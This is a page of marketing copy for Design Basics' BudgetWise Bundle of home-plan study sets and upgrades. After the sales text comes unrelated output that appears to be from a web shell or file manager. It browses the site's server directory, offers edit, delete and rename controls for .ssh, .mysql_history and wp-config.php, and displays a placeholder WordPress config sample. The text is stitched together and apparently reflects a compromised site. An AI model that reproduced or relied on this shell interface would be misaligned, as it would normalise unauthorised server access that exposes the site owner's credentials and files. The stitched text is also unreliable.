Build with confidence, knowing your dream home works for your budget as well as how you want your home to live! Receive a full study set of plans for the design you select for estimating purposes (it is illegal to build from study sets). If that home doesn’t work, order the study set for another plan to review – up to five (5) different plans total within one year. Get this, and more, with our BudgetWise Bundle.
Ready to take advantage of our BudgetWise Bundle, or have further questions?
$100 Study Sets* for up to five (5) different plans ordering within one (1) year (typically over $600 each). And, the $100 is applied towards the purchase of the plan you license for construction.
Plus: A 10% discount on the home plan you license†
*Applies to Design Basics, Scholz Design, Carmichael & Dame Designs, and Plan Pros, Inc., plans only. †Full construction prints only (PDF, sets, or CAD files) purchased directly from Design Basics.
One FREE Upgrade* per Plan Licensed
*For each plan licensed, choose one available upgrade for that plan: Alternate foundation (basement, crawl, or slab);
Alternate exterior wall framing (2×4″ or 2×6″); Forward + Reverse plans; No-Step Entry floor plan; or Materials Estimate list (not all upgrades available for all plans).
FREE Specifications & Finishing Checklist
Keep track of your product selections and finishes, further ensuring you know where you’re at BudgetWise.
*NOT FOR CONSTRUCTION PURPOSES. Applies to Design Basics, LLC, Scholz Design, Carmichael & Dame Designs, and Plan Pros, Inc. home plans.†Full construction prints only (PDF, sets, or CAD files) purchased directly from Design Basics. Excludes custom designs. Does not apply to prior plan license purchases. Cannot be combined with any other promotion or discount.
Forward + Right-Reading Reverse Plans
No-Step Entry Floor Plan
A No-Step Entry floor plan means there are no barriers to enter the home from the front door or the garage entry. This is helpful for occupants and guests with limited mobility.
*For each plan licensed, choose one available upgrade for that plan: Alternate foundation (basement, crawl, or slab); Alternate exterior wall framing (2×4″ or 2×6″); Forward + reverse plans; or a Materials list (not all upgrades available for all plans). Applies to Design Basics, LLC, Scholz Design, Carmichael & Dame Designs, and Plan Pros, Inc. home plans. Full construction prints only (PDF, sets, or CAD files). Excludes custom designs. Does not apply to prior plan license purchases. Cannot be combined with any other promotion or discount.
Plan Modifications
When reviewing your Study Set plans, you may identify some changes you would like to make to the original design. The BudgetWise Bundle provides you a FREE consultation with one of our plan specialists, including an estimate of the fees and time frame to have us modify the original design for you (Note: customization/changes can only be made to the fully-licensed plan, not a Study Set plan). Learn more about Modifying Home Plans.
Current Dir:/var/www/designbasics/
[DIR] .cache [ delete | rename ]
[DIR] .local [ delete | rename ]
[FILE] .mysql_history [ edit | delete | rename ]
[DIR] .ssh [ delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR] wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR] wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR] wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]
Viewing: /var/www/designbasics/wp-config-sample.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'database_name_here' );
/** Database username */
define( 'DB_USER', 'username_here' );
/** Database password */
define( 'DB_PASSWORD', 'password_here' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';